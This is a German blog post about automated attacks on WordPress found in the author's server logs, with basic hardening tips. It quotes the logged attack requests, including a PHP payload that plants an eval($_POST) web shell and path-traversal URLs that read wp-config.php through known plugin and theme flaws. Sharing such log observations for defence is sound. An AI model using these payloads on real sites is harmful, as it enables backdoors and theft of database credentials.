Angriffe auf WordPress

Mittlerweile finde ich jeden Tag Angriffe auf WordPress Installation in meinen Logfiles (auch wenn gar kein WordPress installiert ist).

Es wird einfach alles durchprobiert und das im Sekundentakt.

Da auch Dateinname in unterschiedlichsten Variante aufgerufen werden, sollte alles entfernt werden was nicht gebraucht wird.

Einfache Umbenennung ala

_index_.php

oder ähnliches gänzlich vermeiden.

Das der Admin Zugang von WordPress gesperrt sein sollte via htaccess brauche ich nicht weite erwähnen.

Hier mal ein paar Aufrufe, die ich so gefunden habe (wird ausgebaut)

//der komplette Ausdruck war url_encoded und
//der ausdruck < ? php eval($_POST[1]);? >
//wurde base64_encoded
/?1=@ini_set(„display_errors“,“0″);@set_time_limit(0);@set_magic_quotes_runtime(0);echo ‚->|‘;file_put_contents($_SERVER[‚DOCUMENT_ROOT‘].’//administrator/dbconfig.php‘,‘< ? php eval($_POST[1]); ? >‚);echo ‚|<-'; -- //anascheinend hat das Theme churchope ein sicherheitsproblem /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php //das Plugin ACF Frontend Display /wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php //Das MiwoFTP Plugin hat einen Exploit wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes //auch Fehler in Magento werden mal auf gerne auf einem WordPress Blog aufgerufen, weil ich mal hier was über Magento geschrieben hatte /magmi/web/magmi.php /&sa=U&ved=0ahUKEwjd6de8wd7KAhUkF6YKHZJvAi84ZBAWCJoBMBs&usg=AFQjCNFzwwjAY7taFxvrEE3M3FTt_bKllQ/magmi/web/magmi.php //Hier wird probiert eine alte Lücke in Slider Revolution Plugin aus zunutzen wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php //Auch ungenutzte Templates sollten entfernt werden /wp-content/themes/twentytwelve/page-templates/wp-index.php //acismittop scheint einen VIRUS zu enthalten oder ist ein Virus. Fast alle Seiten die ich dazu gefunden habe, haben eine Google Warnung //wp-content/plugins/acismittop/akismet.php //Auch uralte Lücken werden ausprobiert (von 2012) //wp-property/action_hooks.php In diesem Zusammenhang ist diese Seite ganz hilfreich https://www.exploit-db.com/search/?action=search&description=wordpress